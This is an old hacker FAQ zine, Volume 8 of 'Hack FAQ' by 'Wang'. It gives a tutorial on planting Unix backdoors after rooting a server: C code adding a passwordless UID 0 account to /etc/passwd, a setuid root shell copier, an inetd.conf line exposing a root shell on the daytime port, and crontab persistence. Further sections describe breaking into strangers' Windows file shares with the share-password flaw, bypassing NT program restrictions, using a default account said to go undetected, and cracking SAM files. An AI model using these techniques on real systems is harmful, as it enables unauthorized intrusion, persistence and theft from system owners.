Hack FAQ Volume 8 by Wang
Frequently asked questions about hacking and computers

Ok - you have a right to be angry at me :) - This volume took ages to get out. Well, there have been lots of things going on, and time has had to be divided up as best as I could. Firstly, Mod-X has taken up a lot of my time (Mod-X is the challenge I made btw). I was only talking about making Mod-X in the last volume, but now it is all finished and up...with more challenges in the making. It has mixed responses, mostly because of the difficulty of the challenges. The people that don't seem to like Mod-X are the people who can't get past the initiation challenge or level 1 :) - but the people who have gone on all like it.

I have also been busy with the Wang Products site, and have finally made the screen saver cracking program "CDSaver" available. There has been a large demand for it, and I know a lot of people were hoping for free copies :) - but the program took ages to write and test, and thats why it is not free. Also, since the last volume I was promoted to a General of the CyberArmy which is a great honour. I have also taken over the position Commander of Red Division, Ready Response...which is a lot of work.

Anyhow, enough of my poor excuses :) - enjoy the volume and please keep requests topics to be covered. One thing though - when you use the request topic form on the site - please actually submit a topic to be covered! I get too many "Please tell me how to break into this" email messages. Ideally I want emails through like "Please could you do a topic covering this:"...as opposed to people just out for me to solve their personal problems :)

If you have any topics you want covering, please email me at wang@most-wanted.com and I will consider putting them into the next volume, or you can fill in my online question form on the site. If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).

If you want to join our mailing list and be notified as soon as a new Hack FAQ is released, you can sign up by clicking here


Jump to a topic:

Leaving Backdoors - a variety of methods

How to stop people getting your IP over ICQ

.plan - impress your friends :)

Stopping the mIRC CTCP replies

NetBIOS hacking

A few Windows NT tips - by KernelShell

Emails


Leaving Backdoors - a variety of methods

Sources:
What is a backdoor? Well, a backdoor is some way into a system other than using the normal procedure (normal procedure could be the login prompt, or an authentication routine). Backdoors can exist for a number of reasons:

There are many different types of backdoor. I don't want to go to in depth into the types, because I think examples will be better. A trojan (discussed in earlier volumes) is a backdoor - programs like Sub Seven or Netbus etc. allow people to get into your box. However, most backdoors hackers leave will simply involve creating new accounts on the system (with admin privaleges) or turning on a feature of the program/Operating System which allows them to connect to it in a different way. These are the kind of backdoors I want to tackle today.

These will focus on mainly Unix operating systems, simply because Windows backdoors are mostly just what I have said - trojans. Requires no skill (unless you take the time to write your own). So...we will look at the complex world of unix backdoors - and many different techniques of creating backdoors within a system.

** Please Note: I am not encouraging the creation of backdoors - I am simply demonstrating how they can exist - which in turn will help admin's to detect them! **

Backdoor idea 1 - the passwd entry

The first method we will look at is by far the simplest. Ok, you have read the last hack faq volume's topic about CGI exploits. Lets say you choose to use that information on a web site somewhere, and you got the password file from the server. After a few mins of cracking the password file with JTR (John the ripper, unix password brute forcer) you telnet in to the server and log in as root. Bingo...now, what should you do?

Ideally - don't even log in :) - just inform the system administrator of the bug, and let it be...but, for the purposes of this tutorial - we are going to leave a backdoor so that we can get back in with a bit more stealth some other time. For the first backdoor, we are just going to add a new account into the system. Ideally, you should add an account with a usename that isn't obvious (basically what I am saying is - don't use the username Haxor, or rooter - or anything similar!).

To add the account, the best way is to add a UID 0 account to the /etc/passwd file. You can do this manualy by opening the file in a unix text editor (such as pico or vi) and adding a line like:

Simon::0:0:Simon Black:/root:/bin/sh

That would add an account with no password and the username "Simon". If you can't be bothered to add it manually in, you can also run a quick c program to do it, like:

#include <stdio.h>

main()
{
  FILE *fd;
  fd=fopen("/etc/passwd","a+");
  fprintf(fd,"Simon::0:0:Simon Black:/root:/bin/sh\n");
}
That just automates the procedure, and lets face it - using a program like that you will be in and out a lot quicker. Perhaps for a task that small, you may say a program is not necessary...but for more complex backdoors - you will see that writing a program is often necessary :)

Now, the problem with this backdoor is that it is very obvious. Next time the admin checks the file, a new root account will leap out of the screen at him - and it will be obvious that the server has been hacked. So, lets look at something a little better.

Backdoor idea 2 - setuid/setgid shells

This is a popular one, as it is quick and not too messy...but still not great. The hacker simply makes a copy of /bin/sh (or any shell, could be /bin/bash), sets its ownership to the user or group root, and then sets it setuid or setgid. Then, whenever they run the shell it runs with root privileges.

This program automates the task of making this exploit:

#include <stdio.h>
main()
{
  system("cp /bin/sh /tmp/out");
  system("chown root.root /tmp/out");
  system("chmod 4755 /tmp/out");
}
You will notice it places the backdoor in /tmp, which is probably not a great idea - as most system run cronjobs every now and then or reboot to clean out tmp. However, this kind of backdoor can easily be detected by the command:

find / -perm +6000
The output, compared to a previous list of setuid and setgid binaries should show any additions to the system. To avoid this, the hacker can label their setuid shell as a normal (but unused) setuid program such as /sbin/restore.

Backdoor idea 3 - Altering Services

Ok, lets look at something a bit better...remotely accessible backdoor's. The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file looks something like this:

(1)(2)(3)(4)(5)(6)(7)
ftpstreamtcpnowaitroot/usr/etc/ftpdftpd
talkdgramudpwaitroot/usr/etc/ntalkdntalkd

Here is an explanation of each number:

  1. This is the daemon name of the service that appears in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with.


  2. This will tell inetd what type of connection to use when the session is establised . TCP uses streams, and UDP(The connectionless protocol) uses datagrams.


  3. Protocol field, TCP or UDP.


  4. This will tell inetd what the importance of the daemon is. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections.


  5. This is the user the daemon is run as.


  6. Program to run when a connection arrives.


  7. This is the actual command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7). So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. You could make it spawn a program that adds a UID 0 acc, or creates a suid shell.


To take over a service like daytime (something which you can usually access by connecting to a server on port 13 - it just tells you the date and time on the server) would be a fun idea :) Imagine - instead of telling you the time - it would send you straight into a root shell! This backdoor could be placed by doing the following to the /etc/inetd.conf:

Find the line that is similar to this:

daytime    stream    tcp    nowait    root    internal
And change it to:

daytime    stream    tcp    nowait    /bin/sh    sh -i
Then, before this change becomes active the inetd needs to be restarted...so type:

killall -9 inetd
Backdoor idea 4 - Your own service :)

This is very similar to last technique, but this describes how you could make your own service...rather than just alter an existing one.

The only real difference is that you need to add a line instead of just altering a line, and also you will need to alter /etc/services as well as /etc/inetd.conf. The format of the /etc/services file is:

(1)(2)/(3)(4)
smtp25/tcpmail

Here is an explanation of each number:

  1. This is the service


  2. This is the port number


  3. This is the protocol type the service expect


  4. This is the common name associated with the service


So, to add a backdoor - the hacker might do something like:


And bingo :) - telnet to port 22 and you are dropped into a root shell. Notice how the lines added to each file are consistent with each other.

Also - I have an even better example of this for you. Palmito has written a backdoor script specially for this volume. It is written in perl, and you will find it along with this volume in a file called service.pl. The idea would be to put this on the comprimised system, and run it. This would automate the above technique and create a new backdoor for you (it also does technique 1 for you as well). I recommend you take the time to look at the code and see how it works (or learn perl, and then take a look at the source!).

Backdoor idea 5 - Timed Backdoors

For this backdoor we will look at something the admin has (which, having rooted the box, the hacker now has!) - Crontab. Crontab is used to create schedules, i.e. events which occur at specified intervals or times during the day/month/year. So, this is perfect for a backdoor - image the power the hacker can gain with timed backdoors :) For example, imagine a situation where a hacker has rooted your Linux system, and placed a backdoor program (say a simple suid shell) and set Crontab to execute it only at midnight, when he knows your not around...powerful!

The root Crontab jobs are located in /var/spool/crontab/root and can be manually edited. The Crontab lines will look something like this:

(1)  (2)  (3)  (4)  (5)  (6) 
 0   0   *   *   5   /usr/bin/updatedb 

Here is an explanation of each number:

  1. Minute (0-60)


  2. Hour (0-23)


  3. Day (1-31)


  4. Month (1-12)


  5. Day (1-7)


  6. This is the what to execute.


So...the example file entry I used above would execute on a Friday. Now use your imagination! You can manually add anything you want into the /var/spool/crontab/root file. For example, I have seen examples where people have added a new account into the /etc/passwd file, and then written a small script which goes through the passwd file to check whether their account is still there (and put it back in if it isn't) - then, they set Crontab to run this program every day. The result? well...if the admin finds their special backdoor account and removes it...crontab will run their program, which in turn will re-create the account.

Backdoor idea 6 - Re-Exploitation

Most systems have at least a few exploitable holes. If the method the hacker used to get root in the first place is not patched, they may jsut decide to keep on re-exploiting the hole (as opposed to putting a backdoor in). This would be best used on large networks, such as college/universities (which tend to have hundreds and sometimes thousands of poorly maintained UNIX machines on their networks).

Well...there you go :) - a little look into the world of backdoors...something that both hackers and admins need to know about.

How to stop people getting your IP over ICQ

Just a short topic this one, but worth mentioning. ICQ is an instant messaging program available from http://www.icq.com - for all those that didn't already know :)

We have discussed ICQ hacks and tricks in previous volumes...and if you have read that you will know a few things about ICQ and IP addresses. IP addresses are not, by default, available over ICQ - so for example, even if you spoke to me on ICQ, you can't see my IP address. I seem to remember that on earlier versions of ICQ (99b and lower I think) you could actually see everyone's IP - unless they switched the option on to protect themselves. However, this feature was removed from newer ICQ version...why? Because there was no reason why people should have your IP - and it was dangerous.

Say someone was trying to hack you - one of the main things they would try and do is get your IP address, because once they have that - they can start port scanning your PC, or trying exploits etc. Referring to ICQ, a hacker might want your IP so that he can spoof messages to you, or so that he can bomb your ICQ etc.

We discussed that there were two main ways of getting someones IP from ICQ:

So, why is this possible? Well - its because quite a lot of the ICQ communication is, by default, done by direct connections. This basically means that your modem sends information directly to the other persons modem. Now the problem is, for this to occur - ICQ needs to tell you the IP address of the other person...so that your computer knows who to connect and send information to. Hence, if the ICQ program knows your IP...an attacker can extract it out of ICQ :)

You may already be guessing how we can stop this - its very simple...we tell ICQ not to make direct connections! By telling ICQ to do this, all of our messages etc. are sent to the ICQ server, and then sent to the other person...so they never have any direct contact with us...and therefore their ICQ never needs to find out our IP. To stop ICQ making direct connections, do the following (tested on ICQ 2000b):

  1. Open up ICQ and click the "ICQ" button to bring up the menu


  2. Select "Security and Privacy" from the menu


  3. Go to the tab labeled "Direct Connection"


  4. Check the option labeled "Allow Direct Connection with any user upon your authorization"


  5. Press the "Ok" button


  6. Close ICQ, and re-open it


 Very simple, but effective. Now someone trying to get your IP from netstat will not have the your IP listed...and anyone using an ICQ patch to get your IP will have your IP shown as: 0.0.0.0 :)


.plan - impress your friends :)

You've read all the volumes, and already have some things to impress your friends (and make them ph33r u :) - so lets look at another simple but effective thing you can do. If you haven't got any form on unix (like Linux or Solaris etc.) available to you, why not get yourself a shell account? (talked about in earlier volumes). You can get one by using telnet to connect to either sdf.lonestar.org or nether.net on port 23.

So...your friend comes around, and is already impressed by your new-found "telnet into shell" skills. What do you have to do now to prove your are leet?

Lets talk finger. The 'finger' command is a unix command to get information about another user. For example, you might type:

finger Wang

If you did that, you would probably get some output like:

WANG
 Created on 29-Jul-99 04:58:47 [p201-penguin-ghi.tch.virgin.net]
 Logged in 12-Apr-01 12:04:40 [host103-112-180-51.btinternet.com]
 MAIL since 12-Apr-00 17:05:00 [file size of 0 bytes]
Cool huh? well - thats not what I want to talk about today :). What I want to go into, is how to make your finger reply a bit more imaginative. Lets talk plan files.

A plan file, located in your HOME directory, contains information that is displayed whenever another uses requests information about your account using the finger command. The plan file is called '.plan'. Now, the plan file is not created by default (to my knowledge), so you have to create your own. Here's how:


Now...try doing the finger command on your own username! See the text you entered into the .plan file at the bottom? cool! (if not, see the last step above).

Now - use your imagination...you can put anything in there :) - for example, some ascii art is usually a fun way to go :)

Right, the final step. Your friend is with you - so do a couple of finger commands on other usernames, just to show your friend how they normally look....then, show them yours (complete with your flaming skull ascii art image in your .plan :) - and they will, probably...ph33r u.


Stopping the mIRC CTCP replies

This topic has been requested a bit, which strange because WangScript does this all for you anyway :)

So - what are CTCP replies, and why would you want to stop them? Well, CTCP stands for Client-To-Client-Protocol which is a special type of communication between Internet Relay Chat clients. By creating CTCP events, you can make your IRC client (in this case the IRC client we will be refering to is mIRC) react to commands or requests from other users. You can create CTCP events for yourself, and many scripts have special CTCP's for specific functions.

However, the main CTCP'S are:

Please forgive me for not including USERINFO and CLIENTINFO - but they are not as frequently used, however, the techniques mentioned below will work for those two as well. The CTCP VERSION gives information out about what IRC client you are using, and even the version. This is bad because then a person can go and search for possible exploits associated with that version. Also, people will laugh at you if you are using "GlobalChat" :) CTCP TIME, I feel, is also bad because it allows a person to find out where in the world you are. Although you can argue that is not really a worry - whats the point in it? If its useless...lets block it. CTCP FINGER is also one that gives out personal information...and although it can only give out what you tell it - its best to get rid of it totally.

Now, wouldn't it be fun if we could give out a fake FINGER reply? or make our TIME something strange like 26:00pm...and even give out a fake VERSION to make people think we are using globalchat - when we are really packing an awesome script? :)

Lets do it....First, the FINGER and TIME.

Open mIRC, and go to the 'Tools' Menu - then select 'Remote'. Then, enter the following code in:

ctcp 1:finger: {
.notice $me Received CTCP FINGER from $nick $+ / $+ $site
ctcpreply $nick FINGER Go Finger someone else... | halt
}
Then press the "Ok" button. Now connect to an IRC server and CTCP FINGER yourself. What you should find is that you now recieve a warning telling you who is fingering you (with their name and IP) - and the person will recieve the fake reply:

[Wang finger reply]: Go Finger someone else...
Cool huh? Now do the same for CTCP TIME, but use the following code:

ctcp 1:TIME:{
ctcpreply $nick TIME Mon Apr 51 26:91:22 2054 | halt
}
Actually, just quickly - you can also do the same with your /ping reply, using the following code:

ctcp 1:PING:{
ctcpreply $nick PING 7867485453secs | halt
}
There you go, now you can modify that code to do whatever you like - and alter the kinds of replies the CTCP's give. We still haven't mentioned the VERSION CTCP. Now, the problem with this is, its built into mIRC. Now, there are scripts out there that claim to be able to stop this - but trust me, they don't. Usually what you end up with is mIRC replying with a fake version, and the correct version straight after...making it pointless. Although sometimes these scripts may do a fake reply perfectly - 85% of the time they fail, and the true version comes out. So whats the solution? Hex editing

** Note ** A Hex editor is an editor which allows editing and viewing of a file or disk in hexadecimal, along with it's ASCII or EBCDIC text equivalent. Basically - a hex editor allows you to view/edit code for a file at byte level.
Included with this volume is "FileView". FileView is a simple windows hex editor, and is fine for this task. There are better hex editors out there, but this has a simple interface, and will be easier to explain how to use.

Although I am not providing you with the information to remove the mIRC version reply - I would like to point out that I do not encourage you to do this...if you do hex edit the mIRC32.exe file - you do so of your own will. This information is provided as a working example of how hex editing can be used to alter a files information.

Here is how to remove the version reply using FileView:

  1. Make a backup copy of mIRC32.exe


  2. Load up FileView, go to the "file" menu and choose "open", then point it to the location of your mIRC32.exe file


  3. Go to the "find" menu and choose "Search (Text)"


  4. Type "version" and press the "find" button


  5. The cursor will now move to the correct location in the mIRC32.exe file. You should be able to see some interesting text on the right hand side of the hex output.


  6. Place the cursor on the capital "V" of the word "VERSION" - just before the text "Editing out the version reply, huh?"


  7. Keep pressing the backspace key on your keyboard until you have completely overwriten everything from the word "VERSION" to "huh? :)"


  8. Go to the "file" menu and choose "Save"


At this stage - your mIRC will now give no version reply at all. So - we now want to add our own one! Go into mIRC and go to the 'Tools' Menu - then select 'Remote'. Then, enter the following code in:

ctcp 1:VERSION:{
.notice $me Received CTCP VERSION from $nick $+ / $+ $site
ctcpreply $nick VERSION Sorry, I have gone on holiday | halt
}
Then press the "Ok" button. Now connect to an IRC server and CTCP VERSION yourself. What you should find is that you now recieve a warning telling you who is checking your version (with their name and IP) - and the person will recieve your fake version reply (which, using the above code would be "Sorry, I have gone on holiday").

There you go, now you can go on IRC and hold your head up high....well, almost!

NetBIOS Hacking

** Please note, this topic refers to a file called PQWak.exe - this was originally included in this zip file, but was found to be reported by virus scanners as a trojan (even though no signs of problems appeared to exist). You can find a copy of PQWak by searching somewhere like www.google.com...but the theory of this topic still remains **

Computers use things called protocols to communicate with each other. Typically, Windows has standard protocols available to be used (e.g. TCP/IP, NETBEUI, IPX, SNA, Appletalk). These can be used for communication with other computers over the Internet (Wide Area Network) or a standard network (Local Area Network) like you might find in offices, or even your own house :)

One of the most popular protocols lets you share files, disks, directories, and printers etc. to other computers on the same network. This protocol is known as SMB (Server Message Block) standard. An SMB client or server can communicate with just about any other similar program that adheres to this SMB standard including Warp Connect, Warp 4, LAN Server, Lan Server/400, IBM PC Lan and Warp Server (from IBM), LANtastic in SMB mode (from Artisoft), MS-Client, Windows for Workgroups, Windows 95, LAN Manager and Windows NT Workstation & Server, DEC Pathworks, LM/UX, AS/UX, Syntax and Samba.

Now, you probably know the Windows SMB simply by the name "File and Print sharing" - lol, I bet you recognise it now :) Yes, if you have ever set up a little network, you will no doubt have switched on Windows file and print sharing. Basically, it allows you to do just that, share files and printers with other computers connected to your computer. So...whats the problem? Well, as usual - Windows 95, 98, and Millenium shares are insecure even if you have a password set up. What a suprise.

When you turn file and print sharing on in your Windows networking options, you open port 139 up on your computer. This port is then used to communicate using the NetBIOS protocol - and share files and printers with other computers. File and print sharing is dead handy...and mostly means that you can stop using floppy disks to transfer your files between your computers. However, it is too easy to badly set up file and print sharing...and most people leave themselves insecure. How do I mean insecure? Well, lets just say most people end up sharing their folders and printers with the world - rather than just their network!

Port 139 is notorious because it is usually associated with WinNuke and OOB nukes. Basically, people used to always use WinNuke to send "out of band" packets to your port 139 - which caused your computer to crash. This was mainly used on Windows 95 computers, but scarily...unpatched computers are still all over the place.

So, lets begin by getting your computer ready. One of the programs you will need to use is "nbtstat", now - you may have problems using this if you have netbios over TCP/IP disabled (usually only applies to win 95). So, you will need to to into your control panel and select "Network". Then, select TCP/IP and choose "Properties". In there you should see a tab for "NETBIOS" - go into that and check the box that says "I want to enable netbios over TCP/IP". After you have tried this tutorial, you can put your setting back to how they were if you wish.

Ok, so now we need to see if our target system actually has file and print sharing enabled. To do this, we use the program I just mentioned - "nbtstat". Now, lets say your target is "dialup232.bierded-admin.com" who's IP address resolves to "192.124.41.223". To check if the target has file and print sharing enabled, do:

  1. Go to a dos prompt. You can do this by going to the Start Menu, choosing "Run", and typing in "Command".


  2. Then type: "nbtstat -a dialup232.bierded-admin.com" (or "nbtstat -A 192.124.41.223" if you plan to use an IP...notice the captial A).


  3. If you get the message "Host Not Found" - this means they haven't got NETBIOS installed...and therefore - try another hostname or IP!


Ok - so now you should be presented with a cryptic looking table :) - it might look something like this:

Name   Type Status
MyPC <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
MyPC <03> UNIQUE Registered
MyPC <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

The values in the brackets can be:

Now, the important thing is - if the value in the brackets is 20, it means that the target has sharing enabled..and therefore, we can continue. Go to your Start Menu, choose "Run" and type in "\\IP ADDRESS" - where IP ADDRESS is the IP you have been checking with nbtstat (so, using my example I would type \\192.124.41.223). Now, wait for about 10 seconds and you should find yourself connected to their IP - and you should be able to see their shares! (i.e. what folders they are sharing off their computer). At this stage you can start wondering whether or not the person knows they are actually sharing these files to the whole internet!

Now...for some of you, that might be it - mission successful. However, what happens if you try to access the share, and it asks you for a password? Well - a lot of people out there will tell you that brute forcing is the answer...wrong. Brute forcing would only be required if the computer is running Windows NT. Windows 95, 98, 98se, and even ME has a fatal flaw, which if unpatched (and 80% of them will be!) means we can get the password very quickly!

Here is a description of the flaw:

Share level password protection for the File and Print Sharing service in Windows 95/98/98SE/ME can be bypassed.

Share level access provides peer to peer networking capabilities in the Windows 9x/ME environment. It depends on password protection in order to grant or deny access to resources. Due to a flaw in the implementation of File and Print Sharing security, a remote intruder could access share level protected resources without entering a complete password by programatically modifying the data length of the password.

The flaw is due to the NetBIOS implementation in the password verification scheme share level access utilizes. The password length is compared to the length of data sent during the password verification process. If the password was programatically set to be 1 byte, then only the first byte would be verified. If a remote attacker was able to correctly guess the value of the first byte of the password on the target machine, access would be granted to the share level protected resource.

Windows 9x remote administration is also affected by this vulnerability because it uses the same authentication scheme. Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share.

 There you go - sounds good eh? lol...I bet it does :) - Now, I know most of you won't be interested in the real coding that makes this flaw possible - but unlike most, I still feel this is important. This is why I have included the proper description of the flaw above, and included the C source implementation of the exploit with this faq (samba.txt). However, I know some of you just want to get on and exploit the bug - so I also included "PQWak.exe" which is a compiled program :) - so, choose your own path...are you a script-kiddie? lol

So - go back and look at the output you got from nbtstat - the first item in the first row under the "Name" field is the NETBIOS name - and you will now need that (for my example, the NETBIOS name would be "MyPC"). Open up PQWak.exe and feed in the information you should now have: Now hit "ok" - and you should be given the password to the share with amazing speed :) - basically, it will try to guess the first letter of the password (and it knows when it gets it right) - then move on to the second letter etc. So, I guess strictly you could describe it as a form of brute forcing - but, with this flaw you should get the pass in seconds rather than hours. Now go back and double click the share that asked you for a password. Fill in the password that PQWak gave you. Bang :)

As I mentioned, this trick isn't present on NT or 2000 - so they would require some form of brute forcing to get the password...there are loads of tools for that available on the net.


A few Windows NT Tips - by KernelShell

Just a couple of NT tips :->

1. All programs are banned from running in NT. To get around this simply rename the .exe to an allowed .exe e.g telnet.exe would be renamed to winword.exe(ms word) or musrmgr.exe would be renamed to calc.exe(calculator) and so on. This method definately works.

2. If the NT network is secure control panel cannot be run. To get around this simply copy all .cpl files from "c:\winnt\system32". Copy these to another folder. Then copy control.exe to the same folder and rename it to an allowed filename.(winword.exe etc.) Then drag the .cpl files into the .exe and this will run that control panel extension.

3.(Note: This may or may not work as I have yet to try it.) If the logon screen in NT goes onto a screen saver after a particular time this should work. Rename musrmgr.exe to logon.scr and vice versa. This means that instead of the screen saver coming on at the CTRL+ALT+DEL prompt user manager will come on. This will take approx. 15mins.

4. A small default account to use is Username: IUSR_MAIL Password:(Leave blank). This should give you admin rights. BE CAREFUL: A friend of mine changed the password on this account and subsequently was BUSTED. If the password isn't changed this account is UNDETECTABLE as we managed to use it for a couple of months without detection.

5. The password file in NT is called sam.log, and security.log. You can use a program like l0phtcrack to crack it (http://www.l0pht.com)

Emails

Here are a couple of the more interesting emails I have sent (or been sent) since the last volume. By interesting - I mean they were actually using the hack faq submission form to ask me something productive, or request a topic - rather than ask me to get into an email account for them.

Actually here is the top 5 worst email topics sent through the form this volume:

  1. Asking if I can get you into an email account (for various reasons)
  2. Asking if I can get your +o status back on IRC
  3. Teach you how to hack (read the volumes!)
  4. Asking what you can do with an IP address (read the volumes!)
  5. Asking a question we have been over before (read the volumes!)

hello,

I am Dredflee from romania and i want to make a thing that you didn't mentioned in HaCk FAQ Volume 6 at "Bypassing local restrictions", there is a dword in the registry that can restrict the run of applications.

You can find it in:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

It is called RestrictRun and the disabled value is 00000000. You can also see what the administrator of the network restricted by looking at the key RestrictRun in:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

Here you can find strings with numbers from 1 to ... n (n the number of aplications you can run)... the content of the strings are the name of the applications you can run (ex: "1 regedit.exe", "2 notepad.exe").

I hope this info will help you!

Regards,
Dredflee
Hello,

I'm not sure whether you're making this one already or not, but you should have a lesson on Message boards, a BBS in other words. Cover how to crack into them and be able to delete any certain message you want, completely erase every message, erase subject, delete a users profile, and so on.

Wang's Reply:

Hey,

The problem with message boards is that there are so many out there...and no break into them will probably be specific to the message board you are looking at. Mostly I would say look for common things like:

1> Is the board known to have problems? Do a vulnerability search for the name of the cgi/asp/php script etc.

2> Does it filter out html/ssi tags in your posts? If not - you could get unfiltered code onto the page. This is not major if you can only get html onto the board (you could put a <img> tag in to re-direct them to con/con or something silly) - but if the page is .shtml - and it doesn't filter ssi tags...then you have the board hacked :)

3> Download the board code onto your computer (i.e. go and find where the board comes from) - and then you can look through the code yourself to find weaknesses - or see where the default password file for it is stored etc. This is often the best way of breaking into a board - or any cgi for that matter.


Conclusion
We are 8 volumes in now, and we have covered quite a number of topics etc. but I noticed we hadn't done much on unix operating systems, so thats why we have a bit more nix in this volume. Last volume we had a topic on cgi exploits, which when exploited may give you access to the passwd file from a server...but what then? That is why I included a topic on unix backdoors this volume, and I hope you will install Linux or something else and try them out as you will learn alot from them.

If there is anything I haven't covered and you would like me to consider putting into my next text file, please email me at: Wang@most-wanted.com - ALSO! if you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).
Wang
http://www.wangproducts.co.uk
http://www.modx.co.uk